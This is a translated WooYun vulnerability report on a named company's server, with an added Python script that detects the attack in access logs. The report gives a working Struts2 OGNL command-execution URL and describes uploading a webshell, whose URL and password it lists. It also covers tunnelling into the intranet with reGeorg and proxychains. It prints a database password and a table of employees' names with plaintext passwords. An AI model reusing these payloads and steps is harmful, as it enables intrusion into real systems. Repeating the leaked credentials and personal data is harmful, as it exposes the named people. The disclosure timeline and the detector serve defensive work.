WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ----------------- http://drop.zone.ci/
2016-01-02: Details reported to the vendor, awaiting vendor response
2016-01-06: Vendor confirmed; details disclosed to the vendor only
2016-01-06: Vendor has fixed the vulnerability and disclosed it proactively; details now public
The vendor was planning to send me a gift, and one good turn deserves another, so for the New Year I'll send them another hole in return.
Struts2 remote command execution
http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
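The request above is the public Struts2 DevMode payload: with `struts.devMode=true` the debugging interceptor evaluates whatever `expression=` carries when `debug=command` is set, the OGNL first flips the `allowStaticMethodAccess` flag on `#_memberAccess` through reflection, then spawns `cat /etc/passwd` with `ProcessBuilder` and writes the output into the HTTP response. The Python below is an added example, not code from the report or from the vendor: it shows how a defender would pull that request shape out of combined-format web-server access logs and recover the command the attacker tried to run. The log lines it scans are constructed for this example (client addresses, timestamps, sizes and user agents are invented; only the attack URL is the one quoted in the report), and the marker list and decoding steps are my assumptions about what such a detector should key on.

```python
"""Spot Struts2 DevMode `debug=command` OGNL injection in access-log lines.

Added example, not part of the original WooYun report. SAMPLE_LOG is
constructed: the client IPs, times, sizes and user agents are made up;
the attack URL is the one the report used against oss.cmge.com.
"""
import re
from urllib.parse import parse_qs, unquote

# Strings the DevMode-style payload cannot avoid: the sandbox escape on
# #_memberAccess, static access to ServletActionContext, the process spawn.
# Any one of them inside `expression` counts as a hit.
OGNL_MARKERS = (
    "_memberAccess",
    "allowStaticMethodAccess",
    "@org.apache.struts2.ServletActionContext@",
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
)

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The argv array in `new java.lang.String[]{'cat','/etc/passwd'}`.
ARGV_RE = re.compile(r"java\.lang\.String\[\]\s*\{([^}]*)\}")

PAYLOAD = (  # request target from the report, percent-encoded as sent
    "/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29"
    ".getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,"
    "%23f.set%28%23_memberAccess,true%29,"
    "%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,"
    "%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,"
    "%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,"
    "%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,"
    "%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,"
    "%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29"
)

SAMPLE_LOG = [  # constructed log lines
    # the report's payload, answered with 200: command output went back to the attacker
    '203.0.113.7 - - [02/Jan/2016:13:05:11 +0800] "GET ' + PAYLOAD + ' HTTP/1.1" 200 1842 "-" "curl/7.43.0"',
    # ordinary login page load
    '198.51.100.4 - - [02/Jan/2016:13:05:30 +0800] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # decoy: the attack string sits inside a search term, not in the debug parameter
    '198.51.100.9 - - [02/Jan/2016:13:06:02 +0800] "GET /search.action?q=debug%3Dcommand%26expression%3Dfoo HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    # double-encoded probe without a ProcessBuilder, rejected by the server
    '203.0.113.7 - - [02/Jan/2016:13:07:45 +0800] "GET /login.action?debug=command&expression=%2523f%253D%2523_memberAccess.getClass%2528%2529 HTTP/1.1" 500 0 "-" "curl/7.43.0"',
]


def attempted_command(expression):
    """Return the OS command line the OGNL tries to spawn, or None."""
    m = ARGV_RE.search(expression)
    if not m:
        return None
    argv = re.findall(r"'([^']*)'", m.group(1))
    return " ".join(argv) if argv else None


def inspect_request(target):
    """Classify one request target; returns (is_attack, command_or_None)."""
    # Split on the first '?' ourselves: a raw '#' in the OGNL would make
    # urlsplit() treat the rest of the line as a fragment and hide it.
    query = target.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)  # one level of %-decoding
    if "command" not in params.get("debug", []):
        return False, None
    for expr in params.get("expression", []):
        expr = unquote(expr)  # second decode catches double-encoded probes
        if any(marker in expr for marker in OGNL_MARKERS):
            return True, attempted_command(expr)
    return False, None


def scan_log(lines):
    """Return (client, time, status, command) for every attack request found."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        is_attack, cmd = inspect_request(m.group("target"))
        if is_attack:
            hits.append((m.group("client"), m.group("time"), int(m.group("status")), cmd))
    return hits


if __name__ == "__main__":
    for client, when, status, cmd in scan_log(SAMPLE_LOG):
        print(f"{when} {client} HTTP {status} debug=command OGNL, command: {cmd or '(none)'}")
```

Two points worth keeping in mind when turning this into a real alert: the status code tells you whether the server actually evaluated the expression (a 200 on a `debug=command` request means the output went back to the attacker, a 4xx or 5xx may only be a probe), and a filter that matches the literal `%23_memberAccess` misses the double-encoded variant, which is why the script decodes the parameter value a second time after `parse_qs`.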
Uploaded a one-line webshell: http://oss.cmge.com/config.jsp
$ ifconfig
em1       Link encap:Ethernet  HWaddr F8:BC:12:4A:AB:0C
          inet addr:123.59.73.98  Bcast:123.59.73.111  Mask:255.255.255.240
          inet6 addr: fe80::fabc:12ff:fe4a:ab0c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:234690100 errors:0 dropped:0 overruns:0 frame:0
          TX packets:191975833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:111717497757 (104.0 GiB)  TX bytes:55754980927 (51.9 GiB)
          Interrupt:35

em2       Link encap:Ethernet  HWaddr F8:BC:12:4A:AB:0D
          inet addr:10.200.130.7  Bcast:10.200.130.255  Mask:255.255.255.0
          inet6 addr: fe80::fabc:12ff:fe4a:ab0d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:228082396 errors:0 dropped:0 overruns:0 frame:0
          TX packets:328168633 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:102848879805 (95.7 GiB)  TX bytes:173878904275 (161.9 GiB)
          Interrupt:38

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:69850555 errors:0 dropped:0 overruns:0 frame:0
          TX packets:69850555 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:104502101713 (97.3 GiB)  TX bytes:104502101713 (97.3 GiB)
Check the database configuration file:
#database.jdbc.url=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.shaolin=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.daota=jdbc:mysql://10.200.130.8:3306/goanaysis_daota?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.xingzhan=jdbc:mysql://10.200.130.8:3306/goanaysis_xzhan?useUnicode=true&characterEncoding=UTF-8
database.user=lhm_rw
database.pwd=w&*&PO96>dLD38L)_(HK1P4^LHM^%a
That is a serious password. Web and database are on separate hosts, so I uploaded tunnel.jsp and used reGeorg + proxychains to proxy into the intranet. Very few live hosts inside, it looks segmented, so I just connected to the database directly.
$ python reGeorgSocksProxy.py -p 9527 -u http://oss.cmge.com/tunnel.jsp
# proxychains.conf must point at the reGeorg listener, e.g. "socks5 127.0.0.1 9527"
$ proxychains mysql -h 10.200.130.8 -u lhm_rw -p
mysql> select * from MANAGE_USER;
Every password is weak (and stored in plaintext):
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| id  | UserName    | Passwd | TrueName             | Sex | Org  | RoleId | CreateTime          | CreatorId | LastUpdateTime      | LastUpdateUserId |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| 40  | root        | abc321 | 超级管理员           | 1   | 00   | 40     | 2012-12-13 00:00:00 | 0         | 2015-01-14 14:09:28 | 40               |
| 99  | ken         | abc321 | 肖健                 | 1   |      | 75     | 2015-08-28 15:41:56 | 40        | 2015-08-28 15:41:56 | 40               |
| 101 | oscar       | abc321 | 陈韬                 | 1   |      | 75     | 2015-08-30 00:00:00 | 40        | 2015-10-09 16:29:33 | 40               |
| 107 | danny       | abc321 | 许光翔               | 1   |      | 75     | 2015-08-31 09:41:58 | 40        | 2015-08-31 09:41:58 | 40               |
| 109 | luke        | abc321 | 王晓霖               | 1   |      | 75     | 2015-08-31 09:42:31 | 40        | 2015-08-31 09:42:31 | 40               |
| 110 | adam        | abc123 | 梁红明               | 1   |      | 75     | 2015-09-08 09:51:28 | 40        | 2015-09-08 09:51:28 | 40               |
| 111 | thor        | abc321 | 才健楠               | 1   |      | 76     | 2015-10-09 00:00:00 | 40        | 2015-11-13 14:16:15 | 40               |
| 112 | alan        | abc321 | 彭鹏飞               | 1   |      | 75     | 2015-10-10 16:47:42 | 40        | 2015-10-10 16:47:42 | 40               |
| 113 | huanghui    | abc321 | 黄辉                 | 1   |      | 76     | 2015-10-22 00:00:00 | 40        | 2015-11-13 14:15:59 | 40               |
| 114 | will        | abc321 | will                 | 1   |      | 76     | 2015-10-22 00:00:00 | 40        | 2015-11-13 14:15:50 | 40               |
| 116 | chenfeng    | abc321 | 陈峰                 | 1   |      | 76     | 2015-10-22 00:00:00 | 40        | 2015-10-22 16:46:53 | 40               |
| 117 | zhangsonlin | abc321 | 张松林               | 1   |      | 77     | 2015-10-26 18:11:55 | 40        | 2015-10-26 18:11:55 | 40               |
| 118 | liminmin    | abc321 | 李敏敏               | 2   |      | 76     | 2015-10-27 14:38:09 | 40        | 2015-10-27 14:38:09 | 40               |
| 119 | likeyu      | abc123 | 李科宇               | 1   |      | 77     | 2015-11-13 15:06:51 | 40        | 2015-11-13 15:06:51 | 40               |
| 120 | zhangxin    | abc123 | 张鈊                 | 1   |      | 77     | 2015-11-13 15:07:33 | 40        | 2015-11-13 15:07:33 | 40               |
| 121 | huwenming   | abc123 | 胡文明               | 1   |      | 77     | 2015-11-13 15:07:54 | 40        | 2015-11-13 15:07:54 | 40               |
| 122 | chenpeng    | abc123 | 陈鹏                 | 1   |      | 76     | 2015-11-13 00:00:00 | 40        | 2015-12-21 18:08:16 | 40               |
| 123 | fengmingma  | abc321 | [email protected]    | 1   |      | 76     | 2015-12-23 15:30:35 | 40        | 2015-12-23 15:30:35 | 40               |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
Webshell: http://oss.cmge.com/config.jsp, password: wooyun
Fix recommendation: upgrade.
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-01-06 10:48
Development has been notified to apply the upgrade patch. Thanks!
2016-01-06: Fixed